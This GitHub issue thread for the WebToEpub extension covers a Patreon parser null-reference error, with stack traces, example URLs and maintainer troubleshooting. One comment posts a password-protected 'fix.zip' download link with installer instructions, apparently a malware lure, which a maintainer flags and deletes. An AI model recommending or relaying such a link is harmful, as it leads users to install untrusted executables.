### ISSUE TITLE
Cannot read properties of null (reading 'textContent') from Patreon

### ISSUE THREAD

**Issue by pounat** [dteviot/WebToEpub#1449]
**Describe the bug**
TypeError: Cannot read properties of null (reading 'textContent')
    at PatreonParser.extractTitleImpl (chrome-extension://cbjinfddidgmkpjidgajmedilckihgla/js/parsers/PatreonParser.js:66:39)
    at PatreonParser.extractTitle (chrome-extension://cbjinfddidgmkpjidgajmedilckihgla/js/Parser.js:217:26)
    at PatreonParser.getEpubMetaInfo (chrome-extension://cbjinfddidgmkpjidgajmedilckihgla/js/Parser.js:271:31)
    at processInitialHtml (chrome-extension://cbjinfddidgmkpjidgajmedilckihgla/js/main.js:44:39)
    at populateControlsWithDom (chrome-extension://cbjinfddidgmkpjidgajmedilckihgla/js/main.js:253:9)
    at onMessageListener (chrome-extension://cbjinfddidgmkpjidgajmedilckihgla/js/main.js:16:13)

**To Reproduce**
1. Go to '[...](https://www.patreon.com/posts/...)'
2. open WebtoEpub extension and see error message.

**Expected behavior**
Should bring up the usual screen to choose chapters and turn into epub

**Screenshots**
![image](https://github.com/user-attachments/assets/16871fef-6288-4191-95c5-9dfbcdaff516)

**Desktop (please complete the following information):**
 - OS: Windows 11
 - Browser: Edge & Chrome
 - Version: Edge: Version 127.0.2651.105; windows11 23H2

**Additional context**
I know this has happened before. I tried to download the packed version and add it to my browser that way, but the error is still there.

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by gamebeaker** [comment]
@CosionMa i deleted your Comment because you didn't provide more info what this exe should be.
![Screenshot 2024-08-26 172904](https://github.com/user-attachments/assets/5cfe389c-4bdf-4014-9f11-d35577c5d9d3)

looks like it is the same as in #1447 same file name, zip password, instruction 
If someone just sends a download link without more info i am just going to delete it with a reference of this comment.

**Comment by dteviot** [comment]
@pounat 

I just tried the following, with no problems.
* https://www.patreon.com/cerim
* https://www.patreon.com/ddwebb

Please provide URL you had problem with.

**Comment by Undecaine** [comment]
![image-18](https://github.com/user-attachments/assets/de325e60-982d-468b-be60-2e21f01d9d60)

Same error on win 10 chrome. Strange as it worked perfectly about a week ago on Oct 22 with the same URL. Here is URL causing issue for me now: https://www.patreon.com/collection/554947

**Comment by dteviot** [comment]
@Undecaine 

I'm not getting that error.  The error message indicates that WebToEpub is unable to find a &lt;H1&gt; element with the title.
That said, Patreon is doing stuff to make Chrome fail when opening dev tools to look at the page.

**Comment by Undecaine** [comment]
@dteviot 

I noticed this with chrome as well when troubleshooting, annoying. Inspect element works in Firefox browser but I get a different error when running the addon in Firefox.

**Comment by dteviot** [comment]
@Undecaine 

>  I get a different error when running the addon in Firefox.

What error do you get?

**Comment by Undecaine** [comment]
@dteviot 

This is the error in Firefox

![image-29](https://github.com/user-attachments/assets/91579d4f-6138-4abb-b8c1-050741ecd43d)

**Comment by stormbeta** [comment]
Any updates on this? I still get this error on Patreon feeds regardless of browser used

**Comment by gamebeaker** [comment]
@stormbeta do you have a link i can try to see the error?

**Comment by dteviot** [comment]
@dastrdly6585 

> set the view to condensed, while it detects no posts if the view is set to expanded (which appears to be the default view).

How do you set condensed vs expanded?

**Comment by dastrdly6585** [comment]
@dteviot 

In the options bar for a collection, on the very left there is a toggle between two options. The left one (looks like a window) is the expanded view, while the right one (the bullet list) is the condensed view:

![Image](https://github.com/user-attachments/assets/ebc26817-1df0-456f-9268-2bdf73560c9d)

**Comment by greenskye** [comment]
I get this error whenever I use an alternate filter or sort order. Using the standard order works fine, but applying any sort of filter results in this issue. Tested in both Firefox and Chrome.

`TypeError: Cannot read properties of null (reading 'textContent')
    at PatreonParser.cardToChapter (chrome-extension://akiljllkbielkidmammnifcnibaigelm/js/parsers/PatreonParser.js:28:70)
    at chrome-extension://akiljllkbielkidmammnifcnibaigelm/js/parsers/PatreonParser.js:17:28
    at Array.map (<anonymous>)
    at PatreonParser.getChapterUrls (chrome-extension://akiljllkbielkidmammnifcnibaigelm/js/parsers/PatreonParser.js:17:14)
    at PatreonParser.onLoadFirstPage (chrome-extension://akiljllkbielkidmammnifcnibaigelm/js/Parser.js:452:39)
    at processInitialHtml (chrome-extension://akiljllkbielkidmammnifcnibaigelm/js/main.js:57:30)
    at async populateControlsWithDom (chrome-extension://akiljllkbielkidmammnifcnibaigelm/js/main.js:278:9)`

**Comment by lll000111** [comment]
I just got this error too, for https://www.patreon.com/c/carrarn/posts

>  TypeError: Cannot read properties of null (reading 'textContent')
>    at PatreonParser.fetchChapter (chrome-extension://akiljllkbielkidmammnifcnibaigelm/js/parsers/PatreonParser.js:74:75)
>    at async PatreonParser.fetchWebPageContent (chrome-extension://akiljllkbielkidmammnifcnibaigelm/js/Parser.js:627:30)
>    at async Promise.all (index 0)
>    at async PatreonParser.fetchWebPages (chrome-extension://akiljllkbielkidmammnifcnibaigelm/js/Parser.js:599:17)
>    at async HTMLButtonElement.fetchContentAndPackEpub (chrome-extension://akiljllkbielkidmammnifcnibaigelm/js/main.js:163:9)

**EDIT**

Alright &mdash; I found https://github.com/dteviot/WebToEpub/issues/2952
